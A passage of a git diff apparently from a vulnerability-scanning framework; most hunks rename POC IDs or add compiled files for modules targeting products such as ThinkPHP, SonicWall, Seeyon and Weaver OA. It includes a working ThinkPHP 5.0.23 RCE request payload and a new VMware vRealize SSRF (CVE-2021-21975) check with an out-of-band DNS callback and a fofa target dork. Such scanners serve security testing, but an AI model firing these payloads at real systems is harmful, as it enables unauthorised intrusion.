req = requests.post(url,headers = headers , data=data,proxies = self.proxy ,timeout = self.timeout,verify = False)
if req.status_code ==200 and "Link encap:Ethernet" in req.text:
- vuln = [True,req.text]
+
+ result = req.text.split("wrap=\"virtual\">")[1].split("")[0]
+
+ vuln = [True,result]
else:
vuln = [False,req.text]
except Exception as e:
diff --git a/poc/SeeYon_致远/File_Download/__pycache__/poc.cpython-38.pyc b/poc/SeeYon_致远/File_Download/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..c26476c
Binary files /dev/null and b/poc/SeeYon_致远/File_Download/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/SeeYon_致远/File_Upload_ajax_do/__pycache__/poc.cpython-38.pyc b/poc/SeeYon_致远/File_Upload_ajax_do/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..7ab8a7a
Binary files /dev/null and b/poc/SeeYon_致远/File_Upload_ajax_do/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/SeeYon_致远/File_Upload_ajax_do/poc.py b/poc/SeeYon_致远/File_Upload_ajax_do/poc.py
index c4dbcc9..7567e3b 100644
--- a/poc/SeeYon_致远/File_Upload_ajax_do/poc.py
+++ b/poc/SeeYon_致远/File_Upload_ajax_do/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "致远OA ajax.do 任意文件上传", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "致远OA", # 漏洞应用名称
"AppVersion" : """
致远OA V8.0
diff --git a/poc/ShiZiYu_狮子鱼/Sqli_ApiController/__pycache__/poc.cpython-38.pyc b/poc/ShiZiYu_狮子鱼/Sqli_ApiController/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..c5fdc15
Binary files /dev/null and b/poc/ShiZiYu_狮子鱼/Sqli_ApiController/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/ShiZiYu_狮子鱼/Sqli_ApiController/poc.py b/poc/ShiZiYu_狮子鱼/Sqli_ApiController/poc.py
index db8b0e8..d181d4c 100644
--- a/poc/ShiZiYu_狮子鱼/Sqli_ApiController/poc.py
+++ b/poc/ShiZiYu_狮子鱼/Sqli_ApiController/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "狮子鱼CMS ApiController.class.php SQL注入漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "狮子鱼CMS", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/ShiZiYu_狮子鱼/Sqli_ApigoodsController/__pycache__/poc.cpython-38.pyc b/poc/ShiZiYu_狮子鱼/Sqli_ApigoodsController/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..27a7e4e
Binary files /dev/null and b/poc/ShiZiYu_狮子鱼/Sqli_ApigoodsController/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/ShiZiYu_狮子鱼/Sqli_ApigoodsController/poc.py b/poc/ShiZiYu_狮子鱼/Sqli_ApigoodsController/poc.py
index 828c4fd..e50c95c 100644
--- a/poc/ShiZiYu_狮子鱼/Sqli_ApigoodsController/poc.py
+++ b/poc/ShiZiYu_狮子鱼/Sqli_ApigoodsController/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "狮子鱼CMS ApigoodsController.class.php SQL注入漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "狮子鱼CMS", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/ShopXO/FileRead_CNVD_2021_15822/__pycache__/poc.cpython-38.pyc b/poc/ShopXO/FileRead_CNVD_2021_15822/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..e6be89a
Binary files /dev/null and b/poc/ShopXO/FileRead_CNVD_2021_15822/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/SonarQube/Info_Disclosure_CVE_2020_27986/__pycache__/poc.cpython-38.pyc b/poc/SonarQube/Info_Disclosure_CVE_2020_27986/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..6e66372
Binary files /dev/null and b/poc/SonarQube/Info_Disclosure_CVE_2020_27986/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/SonicWall_SSL_VPN/RCE_jarrewrite/__pycache__/poc.cpython-38.pyc b/poc/SonicWall_SSL_VPN/RCE_jarrewrite/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..13f055f
Binary files /dev/null and b/poc/SonicWall_SSL_VPN/RCE_jarrewrite/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/SonicWall_SSL_VPN/RCE_jarrewrite/poc.py b/poc/SonicWall_SSL_VPN/RCE_jarrewrite/poc.py
index 4846283..da4ed88 100644
--- a/poc/SonicWall_SSL_VPN/RCE_jarrewrite/poc.py
+++ b/poc/SonicWall_SSL_VPN/RCE_jarrewrite/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "SonicWall SSL-VPN 远程命令执行漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "SonicWall SSL-VPN", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/TCC_斗象/Weak_Pass_ARL/__pycache__/poc.cpython-38.pyc b/poc/TCC_斗象/Weak_Pass_ARL/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..6605ce5
Binary files /dev/null and b/poc/TCC_斗象/Weak_Pass_ARL/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/TCC_斗象/Weak_Pass_ARL/poc.py b/poc/TCC_斗象/Weak_Pass_ARL/poc.py
index 8aa0353..b1dbfec 100644
--- a/poc/TCC_斗象/Weak_Pass_ARL/poc.py
+++ b/poc/TCC_斗象/Weak_Pass_ARL/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "斗象资产灯塔系统(ARL) 弱口令检测", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/TVT_同为股份/Dir_Traversal_NVMS_1000/__pycache__/poc.cpython-38.pyc b/poc/TVT_同为股份/Dir_Traversal_NVMS_1000/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..a89ed27
Binary files /dev/null and b/poc/TVT_同为股份/Dir_Traversal_NVMS_1000/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/TVT_同为股份/Dir_Traversal_NVMS_1000/poc.py b/poc/TVT_同为股份/Dir_Traversal_NVMS_1000/poc.py
index 99ccec7..fa82607 100644
--- a/poc/TVT_同为股份/Dir_Traversal_NVMS_1000/poc.py
+++ b/poc/TVT_同为股份/Dir_Traversal_NVMS_1000/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "TVT数码科技 NVMS-1000 路径遍历漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "NVMS-1000", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/TamronOS_IPTV/Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/TamronOS_IPTV/Info_Disclosure/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..2a26c89
Binary files /dev/null and b/poc/TamronOS_IPTV/Info_Disclosure/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/TamronOS_IPTV/Info_Disclosure/poc.py b/poc/TamronOS_IPTV/Info_Disclosure/poc.py
index a65599c..4215c17 100644
--- a/poc/TamronOS_IPTV/Info_Disclosure/poc.py
+++ b/poc/TamronOS_IPTV/Info_Disclosure/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "TamronOS IPTV系统 后台配置敏感信息", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "TamronOS IPTV系统", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/TamronOS_IPTV/RCE_api_ping/__pycache__/poc.cpython-38.pyc b/poc/TamronOS_IPTV/RCE_api_ping/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..bec6c74
Binary files /dev/null and b/poc/TamronOS_IPTV/RCE_api_ping/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/TamronOS_IPTV/RCE_api_ping/poc.py b/poc/TamronOS_IPTV/RCE_api_ping/poc.py
index eba2a7f..f043265 100644
--- a/poc/TamronOS_IPTV/RCE_api_ping/poc.py
+++ b/poc/TamronOS_IPTV/RCE_api_ping/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "TamronOS IPTV系统存在前台命令执行漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "TamronOS IPTV系统", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/TamronOS_IPTV/User_Add_Submit/__pycache__/poc.cpython-38.pyc b/poc/TamronOS_IPTV/User_Add_Submit/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..1e86e69
Binary files /dev/null and b/poc/TamronOS_IPTV/User_Add_Submit/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/TamronOS_IPTV/User_Add_Submit/poc.py b/poc/TamronOS_IPTV/User_Add_Submit/poc.py
index e1b546c..71d34fc 100644
--- a/poc/TamronOS_IPTV/User_Add_Submit/poc.py
+++ b/poc/TamronOS_IPTV/User_Add_Submit/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "TamronOS IPTV系统 submit 任意用户创建漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "TamronOS IPTV系统", # 漏洞应用名称
"AppVersion" : "None", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/Thinkphp/RCE_5022_5129/__pycache__/poc.cpython-38.pyc b/poc/Thinkphp/RCE_5022_5129/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..47ef691
Binary files /dev/null and b/poc/Thinkphp/RCE_5022_5129/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Thinkphp/RCE_5022_5129/poc.py b/poc/Thinkphp/RCE_5022_5129/poc.py
index c343be7..193256f 100644
--- a/poc/Thinkphp/RCE_5022_5129/poc.py
+++ b/poc/Thinkphp/RCE_5022_5129/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "ThinkPHP5", # 漏洞应用名称
"AppVersion" : "ThinkPHP5 5.0.22/5.1.29", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/Thinkphp/RCE_5023/__pycache__/poc.cpython-38.pyc b/poc/Thinkphp/RCE_5023/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..258683c
Binary files /dev/null and b/poc/Thinkphp/RCE_5023/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Thinkphp/RCE_5023/poc.py b/poc/Thinkphp/RCE_5023/poc.py
index f4229f5..42cbfd4 100644
--- a/poc/Thinkphp/RCE_5023/poc.py
+++ b/poc/Thinkphp/RCE_5023/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "ThinkPHP5 5.0.23 远程代码执行漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "ThinkPHP5", # 漏洞应用名称
"AppVersion" : "ThinkPHP5 <= 5.0.23", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
@@ -45,8 +45,9 @@ class POC(POCBase):
"""
vuln = [False,""]
url = self.target + "/index.php?s=captcha" # url自己按需调整
- data = "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=-1"
-
+ # data = "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=-1"
+ data = "_method=__construct&method=get&filter=call_user_func&get[]=phpinfo"
+
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
"Content-Type": "application/x-www-form-urlencoded",
@@ -57,10 +58,7 @@ class POC(POCBase):
检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
"""
req = requests.post(url,data = data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
- if "PHP Version" in req.text and \
- "Configure Command" in req.text and \
- "phpinfo()" in req.text and \
- req.status_code == 200:
+ if "phpinfo()" in req.text and req.status_code == 200:
vuln = [True,req.text]
else:
vuln = [False,req.text]
diff --git a/poc/Tongda_通达OA/AnyUser_Login_Version2017/__pycache__/poc.cpython-38.pyc b/poc/Tongda_通达OA/AnyUser_Login_Version2017/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..42aa3dc
Binary files /dev/null and b/poc/Tongda_通达OA/AnyUser_Login_Version2017/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Tongda_通达OA/AnyUser_Login_Version2017/poc.py b/poc/Tongda_通达OA/AnyUser_Login_Version2017/poc.py
index 93b5fd4..bc2a449 100644
--- a/poc/Tongda_通达OA/AnyUser_Login_Version2017/poc.py
+++ b/poc/Tongda_通达OA/AnyUser_Login_Version2017/poc.py
@@ -36,7 +36,9 @@ class POC(POCBase):
def _verify(self):
"""
返回vuln
+
存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
不存在漏洞:vuln = [False,""]
"""
vuln = [False,""]
diff --git a/poc/Tongda_通达OA/Computer_Name_Plugin/__pycache__/poc.cpython-38.pyc b/poc/Tongda_通达OA/Computer_Name_Plugin/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..bf4e427
Binary files /dev/null and b/poc/Tongda_通达OA/Computer_Name_Plugin/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Tongda_通达OA/Sql_inj_TongDa/__pycache__/poc.cpython-38.pyc b/poc/Tongda_通达OA/Sql_inj_TongDa/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..64ae945
Binary files /dev/null and b/poc/Tongda_通达OA/Sql_inj_TongDa/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Tongda_通达OA/Version_Info_Plugin/__pycache__/poc.cpython-38.pyc b/poc/Tongda_通达OA/Version_Info_Plugin/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..1a59c7c
Binary files /dev/null and b/poc/Tongda_通达OA/Version_Info_Plugin/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/UTT_艾泰科技/WeakPass_Net_Manager_System/__pycache__/poc.cpython-38.pyc b/poc/UTT_艾泰科技/WeakPass_Net_Manager_System/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..bf47d83
Binary files /dev/null and b/poc/UTT_艾泰科技/WeakPass_Net_Manager_System/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/UTT_艾泰科技/WeakPass_Net_Manager_System/poc.py b/poc/UTT_艾泰科技/WeakPass_Net_Manager_System/poc.py
index d606918..0d7e4ab 100644
--- a/poc/UTT_艾泰科技/WeakPass_Net_Manager_System/poc.py
+++ b/poc/UTT_艾泰科技/WeakPass_Net_Manager_System/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "艾泰网络管理系统弱口令", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "艾泰网络管理系统", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/VMware/File_read_vCenter/__pycache__/poc.cpython-38.pyc b/poc/VMware/File_read_vCenter/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..8989fff
Binary files /dev/null and b/poc/VMware/File_read_vCenter/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/VMware/SSRF_vRealize_CVE_2021_21975/__pycache__/poc.cpython-38.pyc b/poc/VMware/SSRF_vRealize_CVE_2021_21975/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..bd9f7fe
Binary files /dev/null and b/poc/VMware/SSRF_vRealize_CVE_2021_21975/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/VMware/SSRF_vRealize_CVE_2021_21975/poc.py b/poc/VMware/SSRF_vRealize_CVE_2021_21975/poc.py
new file mode 100644
index 0000000..3b473e2
--- /dev/null
+++ b/poc/VMware/SSRF_vRealize_CVE_2021_21975/poc.py
@@ -0,0 +1,87 @@
+# coding:utf-8
+import requests
+from lib.core.common import url_handle,get_random_ua,get_ceye_dns,verify_ceye_dns
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "jijue", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2021-06-09", # POC创建时间
+ "UpdateDate" : "2021-06-09", # POC创建时间
+ "PocDesc" : """
+ 略
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "VMware vRealize Operations Manager SSRF漏洞 CVE-2021-21975", # 漏洞名称
+ "VulnID" : "CVE-2021-21975", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "VMware vRealize Operations Manager", # 漏洞应用名称
+ "AppVersion" : """
+ VMware:vRealize_operations_manager: 8.0.0, 8.0.1, 8.3.0, 8.1.0, 8.1.1, 8.2.0, 7.5.0
+ VMware:cloud_foundation: 4.x 3.x
+ VMware:vRealize_suite_lifecycle_manager: 8.x
+ """, # 漏洞应用版本
+ "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+ vRealize Operations Manager API包含服务器端请求伪造。
+ 可以通过网络访问vRealize Operations Manager API的恶意攻击者可以执行服务器端请求伪造攻击(SSRF),以窃取管理凭据。
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+ title="vRealize Operations Manager"
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+ def _verify(self):
+ """
+ 返回vuln
+
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url = self.target + "/casa/nodes/thumbprints" # url自己按需调整
+
+ success,dns_flag = get_ceye_dns()
+ if success == False:
+ return [False,dns_flag]
+
+ data = """["%s"]""" % (dns_flag)
+
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ "Content-Type": "application/json;charset=UTF-8",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req = requests.post(url,data=data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+
+ flager = verify_ceye_dns(dns_flag)
+
+ if flager == True:
+ vuln = [True,dns_flag]
+ elif flager == False:
+ vuln = [False,dns_flag]
+ else:
+ vuln = [False,flager]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
\ No newline at end of file
diff --git a/poc/Venustech_启明星辰/SQLi_Reportguide/__pycache__/poc.cpython-38.pyc b/poc/Venustech_启明星辰/SQLi_Reportguide/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..53c0499
Binary files /dev/null and b/poc/Venustech_启明星辰/SQLi_Reportguide/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Venustech_启明星辰/SQLi_Reportguide/poc.py b/poc/Venustech_启明星辰/SQLi_Reportguide/poc.py
index ee0477b..541b37c 100644
--- a/poc/Venustech_启明星辰/SQLi_Reportguide/poc.py
+++ b/poc/Venustech_启明星辰/SQLi_Reportguide/poc.py
@@ -19,7 +19,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "天玥运维网关/网御网络审计 Sql注入漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "", # 漏洞应用名称
"AppVersion" : """
天玥运维安全网关V6.0
diff --git a/poc/VoIPmonitor/RCE_CVE_2021_30461/__pycache__/poc.cpython-38.pyc b/poc/VoIPmonitor/RCE_CVE_2021_30461/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..9e98f28
Binary files /dev/null and b/poc/VoIPmonitor/RCE_CVE_2021_30461/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/WayosAC/WayosAC/__pycache__/poc.cpython-38.pyc b/poc/WayosAC/WayosAC/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..b838c0c
Binary files /dev/null and b/poc/WayosAC/WayosAC/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/WayosAC/poc.py b/poc/WayosAC/WayosAC/poc.py
similarity index 100%
rename from poc/WayosAC/poc.py
rename to poc/WayosAC/WayosAC/poc.py
diff --git a/poc/Weaver_泛微OA/Config_Info_Disclosure_DBconfigReader/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/Config_Info_Disclosure_DBconfigReader/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..3550e66
Binary files /dev/null and b/poc/Weaver_泛微OA/Config_Info_Disclosure_DBconfigReader/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Weaver_泛微OA/Config_Info_Disclosure_DBconfigReader/poc.py b/poc/Weaver_泛微OA/Config_Info_Disclosure_DBconfigReader/poc.py
index 80250d6..0683c9e 100644
--- a/poc/Weaver_泛微OA/Config_Info_Disclosure_DBconfigReader/poc.py
+++ b/poc/Weaver_泛微OA/Config_Info_Disclosure_DBconfigReader/poc.py
@@ -4,7 +4,6 @@ from lib.core.common import url_handle,get_random_ua
from lib.core.poc import POCBase
# ...
import urllib3
-import pyDes
urllib3.disable_warnings()
class POC(POCBase):
@@ -22,7 +21,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "泛微 e-cology OA 数据库配置信息泄露漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "泛微 e-cology", # 漏洞应用名称
"AppVersion" : "目前已知为8.100.0531,不排除其他版本,包括不限于EC7.0、EC8.0", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
@@ -84,4 +83,4 @@ class POC(POCBase):
return vuln
def _attack(self):
- return self._verify()
\ No newline at end of file
+ return self._verify()
diff --git a/poc/Weaver_泛微OA/Config_Info_Disclosure_E_Cology_V9/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/Config_Info_Disclosure_E_Cology_V9/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..b39a78b
Binary files /dev/null and b/poc/Weaver_泛微OA/Config_Info_Disclosure_E_Cology_V9/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Weaver_泛微OA/Config_Info_Disclosure_E-cology_V9/poc.py b/poc/Weaver_泛微OA/Config_Info_Disclosure_E_Cology_V9/poc.py
similarity index 100%
rename from poc/Weaver_泛微OA/Config_Info_Disclosure_E-cology_V9/poc.py
rename to poc/Weaver_泛微OA/Config_Info_Disclosure_E_Cology_V9/poc.py
diff --git a/poc/Weaver_泛微OA/File_Read_E_Bridge/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/File_Read_E_Bridge/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..8d18419
Binary files /dev/null and b/poc/Weaver_泛微OA/File_Read_E_Bridge/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Weaver_泛微OA/File_Read_E_Bridge/poc.py b/poc/Weaver_泛微OA/File_Read_E_Bridge/poc.py
index 7ae0ab4..a84702e 100644
--- a/poc/Weaver_泛微OA/File_Read_E_Bridge/poc.py
+++ b/poc/Weaver_泛微OA/File_Read_E_Bridge/poc.py
@@ -20,7 +20,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "泛微云桥 e-Bridge 任意文件读取漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "泛微云桥 e-Bridge", # 漏洞应用名称
"AppVersion" : "泛微云桥 e-Bridge 2018-2019 多个版本", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/Weaver_泛微OA/File_Upload_E_Office_V9_CNVD_2021_49104/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/File_Upload_E_Office_V9_CNVD_2021_49104/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..7a9c171
Binary files /dev/null and b/poc/Weaver_泛微OA/File_Upload_E_Office_V9_CNVD_2021_49104/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Weaver_泛微OA/File_Upload_E_Office_V9_CNVD_2021_49104/poc.py b/poc/Weaver_泛微OA/File_Upload_E_Office_V9_CNVD_2021_49104/poc.py
index 78caf79..b819bc3 100644
--- a/poc/Weaver_泛微OA/File_Upload_E_Office_V9_CNVD_2021_49104/poc.py
+++ b/poc/Weaver_泛微OA/File_Upload_E_Office_V9_CNVD_2021_49104/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "泛微OA E-Office V9文件上传漏洞(CNVD-2021-49104)", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
